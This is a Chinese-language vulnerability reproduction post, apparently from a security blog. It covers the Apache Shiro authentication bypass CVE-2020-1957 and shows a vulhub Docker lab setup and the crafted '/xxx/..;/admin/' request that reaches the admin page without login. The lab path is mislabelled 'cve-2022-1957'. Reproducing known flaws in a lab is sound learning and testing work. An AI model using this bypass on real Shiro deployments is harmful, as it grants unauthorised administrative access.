免责声明

本公众号所发布的文章及工具只限交流学习，本公众号不承担任何责任！如有侵权，请告知我们立即删除。

漏洞概述

Apache Shiro 认证绕过漏洞（CVE-2020-1957）

Apache Shiro是一款开源安全框架，提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用，同时也能提供健壮的安全性。

在Apache Shiro 1.5.2以前的版本中，在使用Spring动态控制器时，攻击者通过构造`..;`这样的跳转，可以绕过Shiro中对目录的权限限制。

靶场环境

vulhub搭建参考：

Vulnhub 靶场环境搭建

进入到vulbub靶场的/vulhub/shiro/cve-2022-1957目录

使用命令：

docker-compose up -d #启动镜像，整个过程比较久，耐心等待

环境搭建完毕，访问http://192.168.0.140:8080/，得到如下页面

漏洞利用与验证

1、访问直接请求管理页面http://192.168.0.140:8080/admin/，无法访问，将会被重定向到登录页面：

2、构造恶意请求http://192.168.0.140:8080/xxx/..;/admin/，即可绕过权限校验，访问到管理页面：

历史推荐

漏洞复现-CVE-2016-4437

漏洞复现-fastjson 1.2.24-rce

漏洞复现-Tomcat8弱口令&&后台Getshell

漏洞复现——CVE-2021-44228

漏洞复现——php inclusion

漏洞复现——CVE-2017-5645